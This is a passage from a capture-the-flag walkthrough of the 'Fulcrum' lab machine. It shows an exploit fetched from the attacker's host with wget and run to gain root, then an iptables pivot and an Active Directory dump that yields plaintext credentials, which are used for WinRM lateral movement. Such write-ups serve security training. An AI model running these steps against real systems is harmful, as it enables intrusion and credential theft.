/snap/core18/2074/usr/bin/passwd
/snap/core18/2074/usr/bin/sudo
/snap/core18/2074/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/2074/usr/lib/openssh/ssh-keysign
/snap/core18/2344/bin/mount
/snap/core18/2344/bin/ping
/snap/core18/2344/bin/su
/snap/core18/2344/bin/umount
/snap/core18/2344/usr/bin/chfn
/snap/core18/2344/usr/bin/chsh
/snap/core18/2344/usr/bin/gpasswd
/snap/core18/2344/usr/bin/newgrp
/snap/core18/2344/usr/bin/passwd
/snap/core18/2344/usr/bin/sudo
/snap/core18/2344/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/2344/usr/lib/openssh/ssh-keysign
/snap/core20/1434/usr/bin/chfn
/snap/core20/1434/usr/bin/chsh
/snap/core20/1434/usr/bin/gpasswd
/snap/core20/1434/usr/bin/mount
/snap/core20/1434/usr/bin/newgrp
/snap/core20/1434/usr/bin/passwd
/snap/core20/1434/usr/bin/su
/snap/core20/1434/usr/bin/sudo
/snap/core20/1434/usr/bin/umount
/snap/core20/1434/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/1434/usr/lib/openssh/ssh-keysign
/snap/core20/1026/usr/bin/chfn
/snap/core20/1026/usr/bin/chsh
/snap/core20/1026/usr/bin/gpasswd
/snap/core20/1026/usr/bin/mount
/snap/core20/1026/usr/bin/newgrp
/snap/core20/1026/usr/bin/passwd
/snap/core20/1026/usr/bin/su
/snap/core20/1026/usr/bin/sudo
/snap/core20/1026/usr/bin/umount
/snap/core20/1026/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/1026/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
/usr/bin/mount
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/passwd
/usr/bin/fusermount
/usr/bin/chsh
/usr/bin/at
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/su
www-data@fulcrum:/tmp$ wget http://10.10.16.3/pwk.py
wget http://10.10.16.3/pwk.py
--2022-09-03 02:38:55--  http://10.10.16.3/pwk.py
Connecting to 10.10.16.3:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3448 (3.4K) [text/x-python]
Saving to: 'pwk.py'

pwk.py              100%[===================>]   3.37K  --.-KB/s    in 0.08s

2022-09-03 02:38:56 (43.9 KB/s) - 'pwk.py' saved [3448/3448]

www-data@fulcrum:/tmp$ python3 pwk.py
python3 pwk.py
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
# script -qc /bin/bash /dev/null
root@fulcrum:/root/.ssh# sudo passwd
sudo passwd
New password: CaiCaiwhoami
Retype new password: CaiCaiwhoami
passwd: password updated successfully
root@fulcrum:/root/.ssh#
```

With root's password changed, SSH in for a proper shell:

```
CrazyInSide:~/.ssh$ ssh root@10.10.10.62
root@10.10.10.62's password:
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-77-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sat 03 Sep 2022 02:46:03 AM UTC

  System load:              1.84
  Usage of /:               95.1% of 27.43GB
  Memory usage:             85%
  Swap usage:               0%
  Processes:                264
  Users logged in:          0
  IPv4 address for ens160:  10.10.10.62
  IPv6 address for ens160:  dead:beef::250:56ff:feb9:21a8
  IPv4 address for virbr0:  192.168.122.1

  => / is using 95.1% of 27.43GB

 * Super-optimized for small spaces - read how we shrank the memory
   footprint of MicroK8s to make it the smallest full K8s around.

   https://ubuntu.com/blog/microk8s-memory-optimisation

161 updates can be applied immediately.
85 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable

The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Mon May  9 16:58:30 2022 from 10.10.14.11
root@fulcrum:~#
```

A ping sweep shows one other live host on the internal network. Its reply carries ttl=128, the Windows default, which fits the PowerShell script and the .NET error seen through nginx:

```
root@fulcrum:~# for i in {1..254}; do (ping -c 1 192.168.122.${i} | grep "bytes from" | grep -v "Unreachable" &); done;
64 bytes from 192.168.122.1: icmp_seq=1 ttl=64 time=0.059 ms
64 bytes from 192.168.122.228: icmp_seq=1 ttl=128 time=7.32 ms
root@fulcrum:~#
```

Check the interesting ports with nc (80 for the web app, 5985 for WinRM), then look at the firewall the host already has:

```
root@fulcrum:~# nc -zv 192.168.122.228 80
Connection to 192.168.122.228 80 port [tcp/http] succeeded!
root@fulcrum:~# nc -zv 192.168.122.228 88
^C
root@fulcrum:~# nc -zv 192.168.122.228 21
^C
root@fulcrum:~# nc -zv 192.168.122.228 445
^C
root@fulcrum:~# nc -zv 192.168.122.228 5985
Connection to 192.168.122.228 5985 port [tcp/*] succeeded!
root@fulcrum:~# iptables -n -L
Chain INPUT (policy ACCEPT)
target     prot opt source               destination
LIBVIRT_INP  all  --  0.0.0.0/0            0.0.0.0/0

Chain FORWARD (policy ACCEPT)
target     prot opt source               destination
LIBVIRT_FWX  all  --  0.0.0.0/0            0.0.0.0/0
LIBVIRT_FWI  all  --  0.0.0.0/0            0.0.0.0/0
LIBVIRT_FWO  all  --  0.0.0.0/0            0.0.0.0/0

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination
LIBVIRT_OUT  all  --  0.0.0.0/0            0.0.0.0/0

Chain LIBVIRT_FWI (1 references)
target     prot opt source               destination
ACCEPT     all  --  0.0.0.0/0            192.168.122.0/24     ctstate RELATED,ESTABLISHED
REJECT     all  --  0.0.0.0/0            0.0.0.0/0            reject-with icmp-port-unreachable

Chain LIBVIRT_FWO (1 references)
target     prot opt source               destination
ACCEPT     all  --  192.168.122.0/24     0.0.0.0/0
REJECT     all  --  0.0.0.0/0            0.0.0.0/0            reject-with icmp-port-unreachable

Chain LIBVIRT_FWX (1 references)
target     prot opt source               destination
ACCEPT     all  --  0.0.0.0/0            0.0.0.0/0

Chain LIBVIRT_INP (1 references)
target     prot opt source               destination
ACCEPT     udp  --  0.0.0.0/0            0.0.0.0/0            udp dpt:53
ACCEPT     tcp  --  0.0.0.0/0            0.0.0.0/0            tcp dpt:53
ACCEPT     udp  --  0.0.0.0/0            0.0.0.0/0            udp dpt:67
ACCEPT     tcp  --  0.0.0.0/0            0.0.0.0/0            tcp dpt:67

Chain LIBVIRT_OUT (1 references)
target     prot opt source               destination
ACCEPT     udp  --  0.0.0.0/0            0.0.0.0/0            udp dpt:53
ACCEPT     tcp  --  0.0.0.0/0            0.0.0.0/0            tcp dpt:53
ACCEPT     udp  --  0.0.0.0/0            0.0.0.0/0            udp dpt:68
ACCEPT     tcp  --  0.0.0.0/0            0.0.0.0/0            tcp dpt:68
root@fulcrum:~#
```

First open ports 81 and 5985 on the hypervisor itself. (DNATed packets traverse FORWARD rather than INPUT, and the INPUT policy is already ACCEPT, so these two rules do no harm but are not what makes the forward work.)

```
root@fulcrum:~# iptables -I INPUT -p tcp -m tcp --dport 81 -j ACCEPT
root@fulcrum:~# iptables -I INPUT -p tcp -m tcp --dport 5985 -j ACCEPT
```

Now the forward: rewrite the destination of anything arriving on port 81 to port 80 on the internal host.

```
root@fulcrum:~# iptables -t nat -A PREROUTING -p tcp --dport 81 -j DNAT --to-destination 192.168.122.228:80
```

Same for 5985 to 5985. Then masquerade the forwarded traffic so the Windows host sends its replies back to the hypervisor rather than to 10.10.16.x directly, allow forwarding, and turn on IP forwarding in the kernel. The libvirt LIBVIRT_FWI chain above rejects every new inbound connection into 192.168.122.0/24 (only RELATED,ESTABLISHED are accepted), so the ACCEPT has to be inserted ahead of the libvirt chains with -I; appending it with -A would put it after the REJECT and the forward would silently fail.

```
root@fulcrum:~# iptables -t nat -A PREROUTING -p tcp --dport 5985 -j DNAT --to-destination 192.168.122.228:5985
root@fulcrum:~# iptables -t nat -A POSTROUTING -j MASQUERADE
root@fulcrum:~# iptables -I FORWARD -j ACCEPT
root@fulcrum:~# iptables -P FORWARD ACCEPT
root@fulcrum:~# sysctl net.ipv4.ip_forward=1
net.ipv4.ip_forward = 1
```

Confirm the NAT rules are in place; the pkts counter on rule 1 already shows a hit:

```
root@fulcrum:~# iptables -t nat -v -L PREROUTING -n --line-number
Chain PREROUTING (policy ACCEPT 1 packets, 229 bytes)
num   pkts bytes target     prot opt in     out     source               destination
1        1    60 DNAT       tcp  --  *      *       0.0.0.0/0            0.0.0.0/0            tcp dpt:81 to:192.168.122.228:80
2        0     0 DNAT       tcp  --  *      *       0.0.0.0/0            0.0.0.0/0            tcp dpt:5985 to:192.168.122.228:5985
```

Browsing to port 81, which is now the internal host's port 80, shows the same page as port 80 on the outside:

So this is the host nginx was proxying all along.

```
CrazyInSide:~/.ssh$ dirsearch -u http://10.10.10.62:81/

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /home/crazyinside/.dirsearch/reports/10.10.10.62-81/-_22-09-03_11-09-08.txt

Error Log: /home/crazyinside/.dirsearch/logs/errors-22-09-03_11-09-08.log

Target: http://10.10.10.62:81/

[11:09:09] Starting:
[11:09:12] 403 -  312B - /%2e%2e//google.com
[11:09:43] 403 -  312B - /\..\..\..\..\..\..\..\..\..\etc\passwd
[11:10:47] 200 -    5KB - /index.htm
```

Nothing much there. Try the recovered WebUser credential against WinRM on the forwarded 5985:

```
CrazyInSide:~/.ssh$ evil-winrm -i 10.10.10.62 -u WebUser -p 'M4ng£m£ntPa55'

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\WebUser\Documents>
```

The flag is still not here:

```
*Evil-WinRM* PS C:\Users\WebUser> cd desktop
*Evil-WinRM* PS C:\Users\WebUser\desktop> ls
*Evil-WinRM* PS C:\Users\WebUser\desktop> ls -force
*Evil-WinRM* PS C:\Users\WebUser\desktop> ipconfig

Windows IP Configuration


Ethernet adapter Ethernet:

   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : fe80::b1ac:4b69:feac:4a7d%7
   IPv4 Address. . . . . . . . . . . : 192.168.122.228
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.122.1
*Evil-WinRM* PS C:\Users> ls


    Directory: C:\Users


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         5/4/2022   5:40 PM                Administrator
d-r---         5/4/2022   5:40 PM                Public
d-----         9/3/2022   3:13 AM                WebUser
```

So perhaps this still isn't the target machine, even though this host has only the one adapter and no route to anything else. The IIS configuration is the next place to look:

```
*Evil-WinRM* PS C:\inetpub\wwwroot> cat web.config
```

```xml
<?xml version="1.0" encoding="UTF-8"?>
<configuration xmlns="http://schemas.microsoft.com/.NetConfiguration/v2.0">
  <connectionStrings>
    <add connectionString="LDAP://dc.fulcrum.local/OU=People,DC=fulcrum,DC=local" name="ADServices" />
  </connectionStrings>
  <system.web>
    <membership defaultProvider="ADProvider">
      <providers>
        <add name="ADProvider"
             type="System.Web.Security.ActiveDirectoryMembershipProvider, System.Web, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a"
             connectionStringName="ADConnString"
             connectionUsername="FULCRUM\LDAP"
             connectionPassword="PasswordForSearching123!"
             attributeMapUsername="SAMAccountName" />
      </providers>
    </membership>
  </system.web>
  <system.webServer>
    <defaultDocument>
      <files>
        <add value="Default.asp" />
        <add value="Default.htm" />
        <add value="index.htm" />
        <add value="index.html" />
        <add value="iisstart.htm" />
      </files>
    </defaultDocument>
  </system.webServer>
</configuration>
```

```
*Evil-WinRM* PS C:\inetpub\wwwroot>
```

The config points the membership provider at an LDAP directory on dc.fulcrum.local and carries a second set of credentials, FULCRUM\LDAP with PasswordForSearching123!, which by its name is a read-only search account. That is enough to enumerate the domain from here; a Google search for "query LDAP with PowerShell" gives the ADSI route:

```
*Evil-WinRM* PS C:\inetpub\wwwroot> $adsi = New-Object ADSI("LDAP://dc.fulcrum.local", "fulcrum\ldap", "PasswordForSearching123!")
*Evil-WinRM* PS C:\inetpub\wwwroot> $searcher = New-Object ADSISearcher($adsi, "(&(objectClass=user))")
*Evil-WinRM* PS C:\inetpub\wwwroot> $searcher.FindAll()

Path                                                                     Properties
----                                                                     ----------
LDAP://dc.fulcrum.local/CN=Administrator,CN=Users,DC=fulcrum,DC=local    {logoncount, codepage, objectcategory, description...}
LDAP://dc.fulcrum.local/CN=Guest,CN=Users,DC=fulcrum,DC=local            {logoncount, codepage, objectcategory, description...}
LDAP://dc.fulcrum.local/CN=DC,OU=Domain Controllers,DC=fulcrum,DC=local  {ridsetreferences, logoncount, codepage, objectcategory...}
LDAP://dc.fulcrum.local/CN=krbtgt,CN=Users,DC=fulcrum,DC=local           {logoncount, codepage, objectcategory, description...}
LDAP://dc.fulcrum.local/CN=ldap,CN=Users,DC=fulcrum,DC=local             {samaccountname, givenname, codepage, objectcategory...}
LDAP://dc.fulcrum.local/CN=923a,CN=Users,DC=fulcrum,DC=local             {samaccountname, givenname, codepage, objectcategory...}
LDAP://dc.fulcrum.local/CN=BTables,CN=Users,DC=fulcrum,DC=local          {samaccountname, givenname, codepage, objectcategory...}
LDAP://dc.fulcrum.local/CN=FILE,CN=Computers,DC=fulcrum,DC=local         {logoncount, codepage, objectcategory, iscriticalsystemobject...}

*Evil-WinRM* PS C:\inetpub\wwwroot>
```

The first result is the Administrator account. Each result exposes its attributes through $_.Properties, so start with that single entry:

```
*Evil-WinRM* PS C:\inetpub\wwwroot> $searcher.FindOne() | %{ $_.Properties }

Name                           Value
----                           -----
logoncount                     {6}
codepage                       {0}
objectcategory                 {CN=Person,CN=Schema,CN=Configuration,DC=fulcrum,DC=local}
description                    {Built-in account for administering the computer/domain}
usnchanged                     {12848}
instancetype                   {4}
name                           {Administrator}
badpasswordtime                {0}
pwdlastset                     {132964712628921140}
objectclass                    {top, person, organizationalPerson, user}
badpwdcount                    {0}
samaccounttype                 {805306368}
lastlogontimestamp             {132964665675803546}
usncreated                     {8196}
objectguid                     {99 149 64 115 108 62 201 74 155 216 168 4 198 81 158 173}
memberof                       {CN=Group Policy Creator Owners,CN=Users,DC=fulcrum,DC=local, CN=Domain Admins,CN=Users,DC=fulcrum,DC=local, CN=Enterprise Admins,CN=Users,DC=fulcrum,DC=local, CN=Schema Admins,CN=Users,DC=fulcrum,DC=local...}
whencreated                    {5/8/2022 6:52:43 AM}
adspath                        {LDAP://dc.fulcrum.local/CN=Administrator,CN=Users,DC=fulcrum,DC=local}
useraccountcontrol             {512}
cn                             {Administrator}
countrycode                    {0}
primarygroupid                 {513}
whenchanged                    {5/8/2022 8:14:22 AM}
dscorepropagationdata          {5/8/2022 7:10:32 AM, 5/8/2022 7:10:32 AM, 5/8/2022 6:55:22 AM, 1/1/1601 6:12:16 PM}
lastlogon                      {132964733510360703}
distinguishedname              {CN=Administrator,CN=Users,DC=fulcrum,DC=local}
logonhours                     {255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255}
admincount                     {1}
iscriticalsystemobject         {True}
samaccountname                 {Administrator}
objectsid                      {1 5 0 0 0 0 0 5 21 0 0 0 216 239 5 69 222 106 231 38 26 113 214 180 244 1 0 0}
lastlogoff                     {0}
accountexpires                 {0}
```

Nothing useful on the built-in account, so dump every object's attributes. The description field in particular is worth reading for each user, since that is where administrators tend to leave notes:

*Evil-WinRM* PS C:\inetpub\wwwroot> $searcher.FindAll() | %{ $_.Properties }
Name                           Value
----                           -----
logoncount                     {6}
codepage                       {0}
objectcategory                 {CN=Person,CN=Schema,CN=Configuration,DC=fulcrum,DC=local}
description                    {Built-in account for administering the computer/domain}
usnchanged                     {12848}
instancetype                   {4}
name                           {Administrator}
badpasswordtime                {0}
pwdlastset                     {132964712628921140}
objectclass                    {top, person, organizationalPerson, user}
badpwdcount                    {0}
samaccounttype                 {805306368}
lastlogontimestamp             {132964665675803546}
usncreated                     {8196}
objectguid                     {99 149 64 115 108 62 201 74 155 216 168 4 198 81 158 173}
memberof                       {CN=Group Policy Creator Owners,CN=Users,DC=fulcrum,DC=local, CN=Domain Admins,CN=Users,DC=fulcrum,DC=local, CN=Enterprise Admins,CN=Users,DC=fulcrum,DC=local, CN=Schema Admins,CN=Users,DC=fulcrum,DC=local...}
whencreated                    {5/8/2022 6:52:43 AM}
adspath                        {LDAP://dc.fulcrum.local/CN=Administrator,CN=Users,DC=fulcrum,DC=local}
useraccountcontrol             {512}
cn                             {Administrator}
countrycode                    {0}
primarygroupid                 {513}
whenchanged                    {5/8/2022 8:14:22 AM}
dscorepropagationdata          {5/8/2022 7:10:32 AM, 5/8/2022 7:10:32 AM, 5/8/2022 6:55:22 AM, 1/1/1601 6:12:16 PM}
lastlogon                      {132964733510360703}
distinguishedname              {CN=Administrator,CN=Users,DC=fulcrum,DC=local}
logonhours                     {255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255}
admincount                     {1}
iscriticalsystemobject         {True}
samaccountname                 {Administrator}
objectsid                      {1 5 0 0 0 0 0 5 21 0 0 0 216 239 5 69 222 106 231 38 26 113 214 180 244 1 0 0}
lastlogoff                     {0}
accountexpires                 {0}
logoncount                     {0}
codepage                       {0}
objectcategory                 {CN=Person,CN=Schema,CN=Configuration,DC=fulcrum,DC=local}
description                    {Built-in account for guest access to the computer/domain}
usnchanged                     {8197}
instancetype                   {4}
name                           {Guest}
badpasswordtime                {0}
pwdlastset                     {0}
objectclass                    {top, person, organizationalPerson, user}
badpwdcount                    {0}
samaccounttype                 {805306368}
usncreated                     {8197}
objectguid                     {98 147 227 7 107 29 20 79 147 154 117 165 204 133 217 29}
memberof                       {CN=Guests,CN=Builtin,DC=fulcrum,DC=local}
whencreated                    {5/8/2022 6:52:43 AM}
adspath                        {LDAP://dc.fulcrum.local/CN=Guest,CN=Users,DC=fulcrum,DC=local}
useraccountcontrol             {66082}
cn                             {Guest}
countrycode                    {0}
primarygroupid                 {514}
whenchanged                    {5/8/2022 6:52:43 AM}
dscorepropagationdata          {5/8/2022 6:55:22 AM, 1/1/1601 12:00:01 AM}
lastlogon                      {0}
distinguishedname              {CN=Guest,CN=Users,DC=fulcrum,DC=local}
iscriticalsystemobject         {True}
samaccountname                 {Guest}
objectsid                      {1 5 0 0 0 0 0 5 21 0 0 0 216 239 5 69 222 106 231 38 26 113 214 180 245 1 0 0}
lastlogoff                     {0}
accountexpires                 {9223372036854775807}
ridsetreferences               {CN=RID Set,CN=DC,OU=Domain Controllers,DC=fulcrum,DC=local}
logoncount                     {16}
codepage                       {0}
objectcategory                 {CN=Computer,CN=Schema,CN=Configuration,DC=fulcrum,DC=local}
msdfsr-computerreferencebl     {CN=DC,CN=Topology,CN=Domain System Volume,CN=DFSR-GlobalSettings,CN=System,DC=fulcrum,DC=local}
iscriticalsystemobject         {True}
operatingsystem                {Windows Server 2019 Standard}
usnchanged                     {24587}
instancetype                   {4}
name                           {DC}
badpasswordtime                {0}
pwdlastset                     {133066638014044691}
serviceprincipalname           {Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/DC.fulcrum.local, ldap/DC.fulcrum.local/ForestDnsZones.fulcrum.local, ldap/DC.fulcrum.local/DomainDnsZones.fulcrum.local, DNS/DC.fulcrum.local...}
objectclass                    {top, person, organizationalPerson, user...}
badpwdcount                    {0}
samaccounttype                 {805306369}
lastlogontimestamp             {133066638072992222}
usncreated                     {12293}
objectguid                     {143 151 162 140 203 166 2 71 128 139 40 15 248 36 220 157}
localpolicyflags               {0}
whencreated                    {5/8/2022 6:55:20 AM}
adspath                        {LDAP://dc.fulcrum.local/CN=DC,OU=Domain Controllers,DC=fulcrum,DC=local}
useraccountcontrol             {532480}
cn                             {DC}
countrycode                    {0}
primarygroupid                 {516}
whenchanged                    {9/3/2022 7:30:07 AM}
operatingsystemversion         {10.0 (17763)}
dnshostname                    {DC.fulcrum.local}
dscorepropagationdata          {5/8/2022 6:55:22 AM, 1/1/1601 12:00:01 AM}
lastlogon                      {133066643997949777}
distinguishedname              {CN=DC,OU=Domain Controllers,DC=fulcrum,DC=local}
msds-supportedencryptiontypes  {28}
samaccountname                 {DC$}
objectsid                      {1 5 0 0 0 0 0 5 21 0 0 0 216 239 5 69 222 106 231 38 26 113 214 180 232 3 0 0}
lastlogoff                     {0}
serverreferencebl              {CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=fulcrum,DC=local}
accountexpires                 {9223372036854775807}
logoncount                     {0}
codepage                       {0}
objectcategory                 {CN=Person,CN=Schema,CN=Configuration,DC=fulcrum,DC=local}
description                    {Key Distribution Center Service Account}
usnchanged                     {12831}
instancetype                   {4}
name                           {krbtgt}
badpasswordtime                {0}
pwdlastset                     {132964665214072440}
showinadvancedviewonly         {True}
serviceprincipalname           {kadmin/changepw}
objectclass                    {top, person, organizationalPerson, user}
badpwdcount                    {0}
samaccounttype                 {805306368}
usncreated                     {12324}
objectguid                     {32 246 229 230 16 133 242 69 157 220 11 54 228 63 85 253}
memberof                       {CN=Denied RODC Password Replication Group,CN=Users,DC=fulcrum,DC=local}
whencreated                    {5/8/2022 6:55:21 AM}
adspath                        {LDAP://dc.fulcrum.local/CN=krbtgt,CN=Users,DC=fulcrum,DC=local}
useraccountcontrol             {514}
cn                             {krbtgt}
countrycode                    {0}
primarygroupid                 {513}
whenchanged                    {5/8/2022 7:10:32 AM}
dscorepropagationdata          {5/8/2022 7:10:32 AM, 5/8/2022 6:55:22 AM, 1/1/1601 12:04:16 AM}
lastlogon                      {0}
distinguishedname              {CN=krbtgt,CN=Users,DC=fulcrum,DC=local}
msds-supportedencryptiontypes  {0}
admincount                     {1}
iscriticalsystemobject         {True}
samaccountname                 {krbtgt}
objectsid                      {1 5 0 0 0 0 0 5 21 0 0 0 216 239 5 69 222 106 231 38 26 113 214 180 246 1 0 0}
lastlogoff                     {0}
accountexpires                 {9223372036854775807}
samaccountname                 {ldap}
givenname                      {ldap}
codepage                       {0}
objectcategory                 {CN=Person,CN=Schema,CN=Configuration,DC=fulcrum,DC=local}
dscorepropagationdata          {1/1/1601 12:00:00 AM}
usnchanged                     {24643}
instancetype                   {4}
logoncount                     {1}
name                           {ldap}
badpasswordtime                {0}
pwdlastset                     {132964669477355095}
objectclass                    {top, person, organizationalPerson, user}
badpwdcount                    {0}
samaccounttype                 {805306368}
lastlogontimestamp             {133066745682798980}
streetaddress                  {unknown}
usncreated                     {12595}
sn                             {user}
company                        {fulcrum}
objectguid                     {150 136 6 204 202 150 221 75 166 233 206 164 157 88 198 236}
whencreated                    {5/8/2022 7:02:27 AM}
adspath                        {LDAP://dc.fulcrum.local/CN=ldap,CN=Users,DC=fulcrum,DC=local}
useraccountcontrol             {66048}
cn                             {ldap}
countrycode                    {0}
l                              {unknown}
primarygroupid                 {513}
whenchanged                    {9/3/2022 10:29:28 AM}
c                              {UK}
lastlogon                      {133066745682798980}
distinguishedname              {CN=ldap,CN=Users,DC=fulcrum,DC=local}
st                             {UN}
postalcode                     {12345}
objectsid                      {1 5 0 0 0 0 0 5 21 0 0 0 216 239 5 69 222 106 231 38 26 113 214 180 79 4 0 0}
lastlogoff                     {0}
accountexpires                 {9223372036854775807}
samaccountname                 {923a}
givenname                      {923a}
codepage                       {0}
objectcategory                 {CN=Person,CN=Schema,CN=Configuration,DC=fulcrum,DC=local}
dscorepropagationdata          {5/8/2022 7:10:32 AM, 1/1/1601 12:00:00 AM}
usnchanged                     {12813}
instancetype                   {4}
logoncount                     {0}
name                           {923a}
badpasswordtime                {0}
pwdlastset                     {132964669589856111}
objectclass                    {top, person, organizationalPerson, user}
badpwdcount                    {0}
samaccounttype                 {805306368}
streetaddress                  {unknown}
usncreated                     {12610}
sn                             {923a}
company                        {fulcrum}
objectguid                     {2 169 160 142 13 17 236 70 152 180 130 93 57 44 104 124}
memberof                       {CN=Domain Admins,CN=Users,DC=fulcrum,DC=local}
whencreated                    {5/8/2022 7:02:38 AM}
adspath                        {LDAP://dc.fulcrum.local/CN=923a,CN=Users,DC=fulcrum,DC=local}
useraccountcontrol             {66048}
cn                             {923a}
countrycode                    {0}
l                              {unknown}
primarygroupid                 {513}
whenchanged                    {5/8/2022 7:10:32 AM}
c                              {UK}
lastlogon                      {0}
distinguishedname              {CN=923a,CN=Users,DC=fulcrum,DC=local}
st                             {UN}
admincount                     {1}
postalcode                     {12345}
objectsid                      {1 5 0 0 0 0 0 5 21 0 0 0 216 239 5 69 222 106 231 38 26 113 214 180 80 4 0 0}
lastlogoff                     {0}
accountexpires                 {9223372036854775807}
samaccountname                 {BTables}
givenname                      {BTables}
codepage                       {0}
objectcategory                 {CN=Person,CN=Schema,CN=Configuration,DC=fulcrum,DC=local}
dscorepropagationdata          {1/1/1601 12:00:00 AM}
usnchanged                     {16404}
instancetype                   {4}
logoncount                     {1}
name                           {BTables}
badpasswordtime                {0}
pwdlastset                     {132964669694854344}
objectclass                    {top, person, organizationalPerson, user}
badpwdcount                    {0}
samaccounttype                 {805306368}
lastlogontimestamp             {132965813265089947}
streetaddress                  {unknown}
usncreated                     {12628}
sn                             {BTables}
company                        {fulcrum}
objectguid                     {211 177 93 142 140 210 161 74 180 157 245 248 33 105 89 254}
info                           {Password set to ++FileServerLogon12345++}
whencreated                    {5/8/2022 7:02:49 AM}
adspath                        {LDAP://dc.fulcrum.local/CN=BTables,CN=Users,DC=fulcrum,DC=local}
useraccountcontrol             {66048}
cn                             {BTables}
countrycode                    {0}
l                              {unknown}
primarygroupid                 {513}
whenchanged                    {5/9/2022 2:48:46 PM}
c                              {UK}
lastlogon                      {132965813265089947}
distinguishedname              {CN=BTables,CN=Users,DC=fulcrum,DC=local}
st                             {UN}
postalcode                     {12345}
objectsid                      {1 5 0 0 0 0 0 5 21 0 0 0 216 239 5 69 222 106 231 38 26 113 214 180 81 4 0 0}
lastlogoff                     {0}
accountexpires                 {9223372036854775807}
logoncount                     {11}
codepage                       {0}
objectcategory                 {CN=Computer,CN=Schema,CN=Configuration,DC=fulcrum,DC=local}
iscriticalsystemobject         {False}
operatingsystem                {Windows Server 2019 Standard}
usnchanged                     {24602}
instancetype                   {4}
name                           {FILE}
badpasswordtime                {0}
pwdlastset                     {133066646717324030}
serviceprincipalname           {WSMAN/FILE, WSMAN/FILE.fulcrum.local, RestrictedKrbHost/FILE, HOST/FILE...}
objectclass                    {top, person, organizationalPerson, user...}
badpwdcount                    {0}
samaccounttype                 {805306369}
lastlogontimestamp             {133066638251998389}
usncreated                     {12854}
objectguid                     {85 210 141 244 110 221 154 74 177 149 208 194 121 84 186 112}
localpolicyflags               {0}
whencreated                    {5/8/2022 8:49:11 AM}
adspath                        {LDAP://dc.fulcrum.local/CN=FILE,CN=Computers,DC=fulcrum,DC=local}
useraccountcontrol             {4096}
cn                             {FILE}
countrycode                    {0}
primarygroupid                 {515}
whenchanged                    {9/3/2022 7:44:31 AM}
operatingsystemversion         {10.0 (17763)}
dnshostname                    {FILE.fulcrum.local}
dscorepropagationdata          {1/1/1601 12:00:00 AM}
lastlogon                      {133066746614970918}
distinguishedname              {CN=FILE,CN=Computers,DC=fulcrum,DC=local}
msds-supportedencryptiontypes  {28}
samaccountname                 {FILE$}
objectsid                      {1 5 0 0 0 0 0 5 21 0 0 0 216 239 5 69 222 106 231 38 26 113 214 180 82 4 0 0}
lastlogoff                     {0}
accountexpires                 {9223372036854775807}
name                           {BTables}
badpasswordtime                {0}
pwdlastset                     {132964669694854344}
objectclass                    {top, person, organizationalPerson, user}
badpwdcount                    {0}
samaccounttype                 {805306368}
lastlogontimestamp             {132965813265089947}
streetaddress                  {unknown}
usncreated                     {12628}
sn                             {BTables}
company                        {fulcrum}
objectguid                     {211 177 93 142 140 210 161 74 180 157 245 248 33 105 89 254}
info                           {Password set to ++FileServerLogon12345++}
whencreated                    {5/8/2022 7:02:49 AM}
adspath                        {LDAP://dc.fulcrum.local/CN=BTables,CN=Users,DC=fulcrum,DC=local}
useraccountcontrol             {66048}

I got a set of credentials: the info attribute of the BTables user holds a password, ++FileServerLogon12345++. It should correspond to this host:

serviceprincipalname           {WSMAN/FILE, WSMAN/FILE.fulcrum.local, RestrictedKrbHost/FILE, HOST/FILE...}

Probing FILE directly is probably blocked by the firewall. FILE is here:

*Evil-WinRM* PS C:\inetpub\wwwroot> $btpass = ConvertTo-SecureString '++FileServerLogon12345++' -AsPlainText -Force
*Evil-WinRM* PS C:\inetpub\wwwroot> $btcred = New-Object System.Management.Automation.PSCredential('FULCRUM\btables', $btpass)
*Evil-WinRM* PS C:\inetpub\wwwroot>
*Evil-WinRM* PS C:\inetpub\wwwroot> Invoke-Command -ComputerName file.fulcrum.local -Credential $btcred -ScriptBlock { whoami }
fulcrum\btables
*Evil-WinRM* PS C:\inetpub\wwwroot> Invoke-Command -ComputerName file.fulcrum.local -Credential $btcred -ScriptBlock { ipconfig }

Windows IP Configuration


Ethernet adapter Ethernet:

   Connection-specific DNS Suffix . :
   Link-local IPv6 Address . . . . . : fe80::7951:5c86:6630:5e64%3
   IPv4 Address. . . . . . . . . . . : 192.168.122.132
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.122.1
